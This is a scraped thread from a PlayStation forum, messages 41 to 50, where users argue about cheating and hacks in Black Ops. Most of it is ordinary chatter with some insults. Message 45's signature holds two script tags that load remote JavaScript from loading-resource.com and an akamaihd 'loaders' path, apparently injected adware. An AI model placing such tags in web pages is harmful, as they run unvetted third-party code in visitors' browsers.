Lombax Warrior
129 posts

Re: How bad are Black Ops Hacks?

May 29, 2012

I think maybe you misunderstood me, I don't use my PS3 for a Blu-ray player. It works great but I find and actual dedicated Blu-ray player better. If i were to replace my Blu-ray player it would be with a player from an Entertainment center but not the PS3. I'm too cheap but my ideal setup would be simple and basic

Big Screen TV (not necessarily a "Smart TV" either)

3D Blu-ray entertainment center

PS3

Honorable mention, a Media Center, either the PS3 or the Entertainment Center but preferably the Entertainment Center

Message 41 of 50 (474 Views)
0 Likes
Lombax Warrior
128 posts

May 30, 2012

Isaid, "Yea I know what you mean"

Message 42 of 50 (474 Views)
0 Likes
First Son
1 posts

Sep 25, 2012
U sir r naive and an idiot. No offense.
Message 43 of 50 (464 Views)
0 Likes
Ghost of Sparta
15300 posts

Sep 25, 2012

red_ranger21191 wrote:
U sir r naive and an idiot. No offense.
  • Poor spelling
  • Poor grammar
  • Clearly uses language to offend
  • Contradicts original message with 'no offense', effectively nullifying the entire statement
  • Statement has no purpose

If you are going to use offensive language, don't sugar coat it. It's already offensive and no one cares if you add 'no offense'.

Imperator Danknovaxperaux Divi filius Imp XIII Pont Max Trib Pot XLIX Cos CXVI Primus Signiferi Box-xy Princeps Moderatores Pater Forum

Fabulous!
Message 44 of 50 (459 Views)
0 Likes
Wastelander
766 posts

Sep 25, 2012

not very many people use that i still havent seen a hacker in black ops

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 45 of 50 (455 Views)
0 Likes
First Son
1 posts

Oct 11, 2012

Many servers are now a one shot or quick snipe game .If your on the wrong side from the beggining forget playing .Either the server disconects  due to the download speed not in there favour or at the start the flag side is nearer to you.many games /black opps /Cod 4 you will find your 5 green bar speed is 3 or less as the cheating side is mostly 5 .Why do persons with most cheat kills disconect as soon as the game finishes .Many times the opposite team will have a clan on your side to show your position or will stike you to show your position .Last night  a start to a game finished with in seconds to which a 4000 score was given to the opposite team with no play .If you pay £45.00 for a new game PLUS maps do you not think you are being cheated from the start .treyarch these games are getting pointless and your robbing us of our hard money.

Message 46 of 50 (413 Views)
0 Likes
Lombax Warrior
136 posts

[ Edited ]
Oct 15, 2012

that,s because they are **bleep** at gameing. 

Edited for profanity.

Message 47 of 50 (407 Views)
0 Likes
First Son
6 posts

Jan 2, 2013

i played a match yesterdat were two players got 90 kills in two minutes

Message 48 of 50 (370 Views)
0 Likes
First Son
1 posts

Jan 7, 2013

your an idiot . of course there's hacks, there is the lag hack thereis a bulletproff hack,you ever notice your not getting a killcam come on of course treyarch's  gonna say there's no hack's ,I mean cant make money if people are afraid to buy your product .I would like to buy a hack that stops everybody else's hacks. I'm sick of lag hack punks

Message 49 of 50 (356 Views)
0 Likes
First Son
4 posts

Jan 7, 2013
Unless you live under a rock you know about the hacks . Black ops 2 is full of hacks like the prestige hack for example unlocks all the gold guns and calling cards i see it in every other lobby. Then there are modded remotes with auto aim and double tap to make guns shoot faster. Look them up. Cheating and hacks are way more common than ppl report. Those that say they don't probably use them . So many ppl hack and claim they are good .i have also encountered full clans with modded controllers and auto aim or groups of kids with prestige hacks . Yes they do exist . Look at combat record on those with prestige master if the stats look outrageous . Ridiculous accuracy along with super high head shots and every gun gold they probably hacked it. The kill to death ratio normally averages up to a 2.00 . The ones with the hack are 10s or higher with less time played . Do the research hacks and mods are out there. Fyi they rarely admit hacking . Some have even told me" so what report me" until playstation actually does something about it The hackers flood the lobbies
Message 50 of 50 (356 Views)
0 Likes